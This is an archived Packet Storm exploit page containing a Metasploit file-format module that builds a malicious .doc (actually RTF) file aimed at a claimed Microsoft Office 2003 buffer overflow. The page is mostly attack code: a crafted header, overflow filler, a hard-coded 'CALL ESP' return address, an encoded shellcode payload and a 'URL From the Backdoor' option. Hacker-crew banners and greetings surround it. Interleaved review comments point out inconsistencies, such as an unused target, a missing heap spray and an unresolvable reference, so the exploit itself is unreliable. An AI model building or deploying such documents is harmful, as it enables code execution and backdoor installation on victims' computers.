packetstorm | KedAns-Dz | PACKETSTORM:109091
History: Jan 25, 2012 - 12:00 a.m.

Microsoft Office 2003 .doc Buffer Overflow

2012-01-25 00:00:00
KedAns-Dz
packetstormsecurity.com
18
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
###  
# Title : Microsoft Office 2003 (.doc) Command Exec and local BOF (msf)  
# Author : KedAns-Dz  
# E-mail : [email protected] ([email protected]) | [email protected] | [email protected]  
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)  
# Web Site : www.1337day.com  
# Facebook : http://facebook.com/KedAns   
# platform : windows ( local BOF via MSF)  
# Type : local exploit / Buffer Overflow / Metasploit  
###  
  
##  
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |  
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |  
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |  
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |  
# | ------------------------------------------------- < |  
###  
  
##  
# $Id: ms09_067_word_exec.rb | 01:59 25/01/2012| KedAns-Dz $  
##  
  
require 'msf/core'  
  
# Metasploit file-format module that assembles a crafted document as one byte
# string and hands it to file_create. The code visible here builds a file only;
# it contains no socket or HTTP calls of its own.
#
# NOTE(review): the base class is Msf::Exploit::Remote, yet the page header and
# the FILEFORMAT mixin both describe a local, file-based issue. Do not read the
# "Remote" base class as evidence of a network attack vector.
# NOTE(review): the page carries no vendor bulletin or CVE identifier for this
# issue; the only reference is the URL in 'References' below. Map it to an
# advisory before using this entry for patch or exposure tracking.
class Metasploit3 < Msf::Exploit::Remote  
# Reliability rank chosen by the author; the page shows no test matrix for it.
Rank = GoodRanking  
  
include Msf::Exploit::FILEFORMAT  
  
# Registers the module metadata and its two user-settable options.
#
# @param info [Hash] metadata passed through update_info and merged with the
#   values declared below
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Microsoft Office 2003 (.doc) Command Exec and local BOF',  
'Description' => %q{  
This module exploits a buffer overflow in Microsoft Office 2003  
and Command Exec With .doc file .  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'b33f',  
'g11tch',  
'KedAns-Dz <ked-h[at]hotmail.com>' # MSF module  
],  
'Version' => '1.0',  
'References' =>  
[  
# NOTE(review): the host "exploit-db" has no top-level domain, so this
# reference does not resolve as written -- presumably entry 18334 on the
# Exploit Database; confirm before citing it.
[ 'URL', 'http://exploit-db/exploits/18334' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
# Constraints handed to the framework's payload encoder: at most 1024 bytes,
# no single-quote character, alphanumeric mixed-case encoding with ESI named
# as the buffer register.
'Payload' =>  
{  
'Space' => 1024,  
'BadChars' => "'",  
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,  
'EncoderOptions' =>  
{  
'BufferRegister' => 'ESI',  
}  
},  
'Platform' => 'win',  
'Targets' =>  
[  
# NOTE(review): 'Ret' is an empty string and exploit() never reads `target`,
# so this entry is descriptive only. The label mentions "Heap Spray", but no
# heap-spray logic appears in this class.
[ 'Microsoft Office 2003 - MSWord (.doc Heap Spray)', { 'Ret' => '' } ],  
],  
'DisclosureDate' => 'JAN 08 2012',  
'DefaultTarget' => 0))  
  
# FILENAME: name of the generated file (default 'msf.doc').
# URLBD: required string, default 'http://'; exploit() appends its transformed
# value to the document after the payload.
register_options(  
[  
OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),  
OptString.new('URLBD', [ true, 'URL From the Backdoor.', 'http://']),  
], self.class)  
end  
  
# Builds the document bytes (fixed header + overflow data + encoded payload +
# URLBD value + closing braces) and passes them to file_create.
#
# Defensive reading: the fixed header is RTF markup, not the binary Word
# format, so the default ".doc" file name does not match the content.
# Inspection and detection should key on the bytes rather than the extension.
def exploit  
# Transform the operator-supplied URLBD value with Rex::Text.to_unescape.
# That helper is defined in the framework, not on this page -- verify its
# exact output format there.
url = Rex::Text.to_unescape(datastore['URLBD'])  
  
# Fixed header. The bytes are plain ASCII: they open with "{\rt##" and contain
# nested "{\shp" / "{\sp" groups, one of which carries the property name
# "pFragments", followed by "9;2;ffffffffff".
file =  
"\x7b\x5c\x72\x74\x23\x23\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70"+  
"\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73"+  
"\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x2a"+  
"\x5c\x73\x68\x70\x69\x6e\x73\x74\x5c\x73\x68\x70\x66\x68\x64\x72"+  
"\x30\x5c\x73\x68\x70\x62\x78\x63\x6f\x6c\x75\x6d\x6e\x5c\x73\x68"+  
"\x70\x62\x79\x70\x61\x72\x61\x5c\x73\x68\x20\x70\x77\x72\x32\x7d"+  
"\x7b\x5c\x73\x70\x7b\x5c\x73\x6e\x20\x7b\x7d\x7b\x7d\x7b\x5c\x73"+  
"\x6e\x7d\x7b\x5c\x73\x6e\x7d\x7b\x5c\x2a\x5c\x2a\x7d\x70\x46\x72"+  
"\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+  
"\x7b\x5c\x73\x76\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+  
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x52"+  
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+  
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x39\x3b\x32\x3b\x66\x66"+  
"\x66\x66\x66\x66\x66\x66\x66\x66"  
# Overflow data: 501 '#' filler bytes, then ASCII-hex text. The only meaning
# the page gives for any of these values is the author's "CALL ESP" comment.
# NOTE(review): that value is hard-coded and the page does not say which
# WINWORD.exe build it was taken from, so treat this as an unverified
# proof of concept.
buf = "\x23" * 501  
buf << "\x30\x35"  
buf << "\x30" * 40  
buf << "\x36\x36\x34\x33\x33\x32\x33\x30" # CALL ESP - WINWORD.exe  
buf << "\x30\x30\x30\x30\x38\x30\x37\x63" * 2  
buf << rand_text_alpha(42)  
buf << "\x39\x30" * 18  
buf << payload.encoded  
  
# Assemble the final document. `doc` is the same String object as `file` (no
# dup), so the appends below also grow `file`; this has no visible effect
# because `file` is not read again.
doc = file  
doc << buf  
doc << url  
doc << "\x00"  
doc << "{}}}}}}"  
doc << "\x0d\x0a"  
doc << "}"  
  
print_status("Creating '#{datastore['FILENAME']}' file...")  
  
# file_create is not defined in this class (presumably supplied by the
# FILEFORMAT mixin); the output location is not shown on this page.
file_create(doc)  
end  
  
end  
  
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================  
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy   
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)   
# Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n  
# Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever  
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X  
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX  
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..  
#=================================================================================================`